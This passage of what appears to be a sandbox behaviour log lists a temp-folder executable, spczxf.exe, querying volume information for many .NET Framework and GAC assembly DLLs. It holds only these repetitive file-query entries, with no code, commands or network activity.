                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsecimpl.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\netstandard.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\netstandard\v4.0_2.0.0.0__cc7b13ffcd2ddd51\netstandard.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentasklauncher.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SbsNclPerf.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ServiceModelRegUI.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SOS.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\sysglobl\v4.0_4.0.0.0__b03f5f7f11d50a3a\sysglobl.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Activities.Core.Presentation.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Activities.Core.Presentation\v4.0_4.0.0.0__31bf3856ad364e35\System.Activities.Core.Presentation.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Activities.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Activities\v4.0_4.0.0.0__31bf3856ad364e35\System.Activities.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Activities.DurableInstancing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Activities.DurableInstancing\v4.0_4.0.0.0__31bf3856ad364e35\System.Activities.DurableInstancing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Activities.Presentation.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Activities.Presentation\v4.0_4.0.0.0__31bf3856ad364e35\System.Activities.Presentation.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.AddIn.Contract.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.AddIn.Contract\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.AddIn.Contract.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.AddIn.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.AddIn\v4.0_4.0.0.0__b77a5c561934e089\System.AddIn.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.AppContext.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.AppContext\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.AppContext.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Collections.Concurrent.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Collections.Concurrent\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Collections.Concurrent.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Collections.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Collections\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Collections.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Collections.NonGeneric.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Collections.Specialized.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Collections.Specialized\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Collections.Specialized.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.ComponentModel.Annotations.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ComponentModel.Annotations\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ComponentModel.Annotations.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.ComponentModel.Composition.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ComponentModel.Composition\v4.0_4.0.0.0__b77a5c561934e089\System.ComponentModel.Composition.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\system.componentmodel.composition.registration.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ComponentModel.DataAnnotations\v4.0_4.0.0.0__31bf3856ad364e35\System.ComponentModel.DataAnnotations.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.ComponentModel.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ComponentModel\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ComponentModel.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ComponentModel.EventBasedAsync\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ComponentModel.EventBasedAsync.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.ComponentModel.Primitives.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ComponentModel.Primitives\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ComponentModel.Primitives.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.ComponentModel.TypeConverter.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Configuration.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Configuration.Install.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Console.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Console\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Console.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Data.Common.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Data.DataSetExtensions.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Entity.Design\v4.0_4.0.0.0__b77a5c561934e089\System.Data.Entity.Design.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Data.Entity.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Entity\v4.0_4.0.0.0__b77a5c561934e089\System.Data.Entity.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Data.Linq.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Linq\v4.0_4.0.0.0__b77a5c561934e089\System.Data.Linq.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Data.OracleClient.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data.OracleClient\v4.0_4.0.0.0__b77a5c561934e089\System.Data.OracleClient.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data.OracleClient\v4.0_4.0.0.0__b77a5c561934e089\System.Data.OracleClient.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data.OracleClient\v4.0_4.0.0.0__b77a5c561934e089\System.Data.OracleClient.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Data.Services.Client.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Services.Client\v4.0_4.0.0.0__b77a5c561934e089\System.Data.Services.Client.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Data.Services.Design.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Services.Design\v4.0_4.0.0.0__b77a5c561934e089\System.Data.Services.Design.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Data.Services.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Services\v4.0_4.0.0.0__b77a5c561934e089\System.Data.Services.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Data.SqlXml.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Deployment.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Design.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Device.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Device\v4.0_4.0.0.0__b77a5c561934e089\System.Device.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Diagnostics.Contracts.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Diagnostics.Contracts\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Diagnostics.Contracts.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Diagnostics.Debug\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Diagnostics.Debug.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Diagnostics.FileVersionInfo.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Diagnostics.Process.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Diagnostics.Process\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Diagnostics.Process.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Diagnostics.StackTrace\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Diagnostics.StackTrace.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Diagnostics.TextWriterTraceListener.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Diagnostics.TextWriterTraceListener\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Diagnostics.TextWriterTraceListener.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Diagnostics.Tools.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Diagnostics.Tools\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Diagnostics.Tools.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Diagnostics.TraceSource.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Diagnostics.TraceSource\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Diagnostics.TraceSource.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Diagnostics.Tracing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Diagnostics.Tracing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Diagnostics.Tracing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.DirectoryServices.AccountManagement.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices.AccountManagement\v4.0_4.0.0.0__b77a5c561934e089\System.DirectoryServices.AccountManagement.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.DirectoryServices.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.DirectoryServices.Protocols.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices.Protocols\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.Protocols.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Drawing.Design.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing.Primitives\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.Primitives.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic.Runtime\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.Runtime.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.EnterpriseServices.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.EnterpriseServices.Thunk.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.EnterpriseServices.Wrapper.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Globalization.Calendars.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Globalization.Calendars\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Globalization.Calendars.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Globalization\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Globalization.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Globalization.Extensions.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.IdentityModel.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.IdentityModel.Selectors.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel.Selectors\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.Selectors.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.IdentityModel.Services.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel.Services\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.Services.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.IO.Compression.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.IO.Compression.ZipFile.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.ZipFile\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.ZipFile.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.IO.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.FileSystem\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.IO.FileSystem.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.IO.FileSystem.DriveInfo.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.FileSystem.DriveInfo\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.IO.FileSystem.DriveInfo.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.IO.FileSystem.Primitives.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.FileSystem.Watcher\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.IO.FileSystem.Watcher.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.IsolatedStorage\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.IO.IsolatedStorage.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.IO.Log.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Log\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.IO.Log.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.IO.MemoryMappedFiles.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.IO.Pipes.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Pipes\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.IO.Pipes.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.IO.UnmanagedMemoryStream.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.UnmanagedMemoryStream\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.IO.UnmanagedMemoryStream.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Linq.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Linq\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Linq.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Linq.Expressions.dll VolumeInformation
